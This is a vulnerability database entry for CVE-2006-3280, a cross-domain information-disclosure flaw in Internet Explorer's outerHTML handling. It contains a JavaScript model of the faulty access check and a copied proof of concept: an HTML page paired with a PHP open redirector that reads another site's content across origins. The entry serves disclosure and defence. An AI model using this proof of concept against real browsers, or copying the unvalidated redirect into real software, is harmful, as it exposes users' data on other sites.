Microsoft Internet Explorer outerHTML Cross-Domain Vulnerability

Vulnerability ID: 1110525    Vulnerability type: Other
Published: 2006-06-27    Updated: 2007-03-29
CVE ID: CVE-2006-3280    CNNVD-ID: CNNVD-200606-581
Platform: Windows    CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/28118
https://www.securityfocus.com/bid/18682
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-581
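|Vulnerability Details
Internet Explorer is a very popular web browser released by Microsoft. A cross-domain vulnerability exists in Microsoft Internet Explorer. An attacker can create a specially crafted object tag whose data parameter references a link on the attacker's site, and that site specifies the target site in the Location HTTP header, so that sensitive information can be read through the object's outerHTML property.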
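The flaw described above, modelled as an added example (not code from Internet Explorer or from the original advisory). It assumes the root cause is that the access decision is made against the URL written in the data attribute rather than the URL the embedded document is finally loaded from after Location redirects; all hostnames and function names are constructed for illustration.

```javascript
// Simplified model of a cross-document access check (illustrative assumption,
// not browser source code). Hostnames below are constructed sample values.
const EMBEDDER = "http://embedder.example/i.html";
const DATA_ATTR = "r.php?http://target.example/page";

// Constructed stand-in for the network: maps a URL to the Location header it returns.
const RESPONSES = new Map([
  [new URL(DATA_ATTR, EMBEDDER).href, "http://target.example/page"],
]);

// Origin = scheme + host + port, as computed by the WHATWG URL parser.
function originOf(url) {
  return new URL(url).origin;
}

// Follow Location redirects until a URL answers without one.
function resolveFinalUrl(startUrl, responses, maxHops = 10) {
  let current = startUrl;
  for (let hop = 0; hop < maxHops; hop++) {
    const location = responses.get(current);
    if (location === undefined) return current; // document is served from here
    current = new URL(location, current).href;  // Location may be relative
  }
  throw new Error("too many redirects");
}

// Flawed check: compares the embedder with the URL as written in the markup,
// so a same-site redirector makes a foreign document look same-origin.
function flawedCanRead(embedderUrl, dataAttr) {
  const requested = new URL(dataAttr, embedderUrl).href;
  return originOf(requested) === originOf(embedderUrl);
}

// Correct check: compares the embedder with the origin the document
// was actually loaded from, after every redirect has been followed.
function correctCanRead(embedderUrl, dataAttr, responses) {
  const requested = new URL(dataAttr, embedderUrl).href;
  const finalUrl = resolveFinalUrl(requested, responses);
  return originOf(finalUrl) === originOf(embedderUrl);
}

console.log("flawed check allows read: ", flawedCanRead(EMBEDDER, DATA_ATTR));
console.log("correct check allows read:", correctCanRead(EMBEDDER, DATA_ATTR, RESPONSES));
```

A document that is genuinely same-origin and served without a redirect passes both checks; only the redirected case separates them.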
|Exploit
source: http://www.securityfocus.com/bid/18682/info

Microsoft Internet Explorer is prone to an information-disclosure vulnerability because it fails to properly enforce cross-domain policies.

This issue may allow attackers to access arbitrary websites in the context of a targeted user's browser session. This may allow attackers to perform actions in web applications with the privileges of exploited users or to gain access to potentially sensitive information. This may aid attackers in further attacks.

The following proof of concept is an incomplete realization of the idea, intended to demonstrate its feasibility.

Windows Server 2003, Enterprise Edition, Service Pack 1, 15/06/2006

Upload the following files to a web server, then go to i.html.
------------------------- i.html -------------------------
<html>
<body onload="setTimeout('alert(o.object.documentElement.outerHTML)',1000)">
<object width=100 height=100 data=r.php?http://www.google.com/123456789 type=text/html id=o></object>
</body>
</html>
------------------------- r.php -------------------------
<?php header("Location: ".$_SERVER["QUERY_STRING"]); ?>

i.html displays the content of the Google web page.
|Affected Products
Nortel Networks Contact Center - Symposium Agent 0
Nortel Networks Contact Center - Agent Desktop Display 0
Nortel Networks Centrex IP Element Manager 0
Nortel Networks Centrex IP Client Manager
|References

Source: US-CERT
Name: TA06-220A
Link: http://www.us-cert.gov/cas/techalerts/TA06-220A.html
Source: US-CERT
Name: VU#883108
Link: http://www.kb.cert.org/vuls/id/883108
Source: XF
Name: ie-redirection-information-disclosure(27452)
Link: http://xforce.iss.net/xforce/xfdb/27452
Source: BID
Name: 18682
Link: http://www.securityfocus.com/bid/18682
Source: BUGTRAQ
Name: 20060704 Re: Browser bugs hit IE, Firefox today (SANS)
Link: http://www.securityfocus.com/archive/1/archive/1/439146/100/0/threaded
Source: BUGTRAQ
Name: 20060630 Re: Browser bugs hit IE, Firefox today (SANS)
Link: http://www.securityfocus.com/archive/1/archive/1/438864/100/0/threaded
Source: BUGTRAQ
Name: 20060630 RE: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS)
Link: http://www.securityfocus.com/archive/1/archive/1/438863/100/0/threaded
Source: BUGTRAQ
Name: 20060630 ISC: Firefox immune to outerHTML flaw in MSIE [Was: Browser bugs hit IE, Firefox]
Link: http://www.securityfocus.com/archive/1/archive/1/438811/100/0/threaded
Source: BUGTRAQ
Name: 20060630 Re: [Full-disclosure] Browser bugs hit IE, Firefox today (SANS)
Link: http://www.securityfocus.com/ar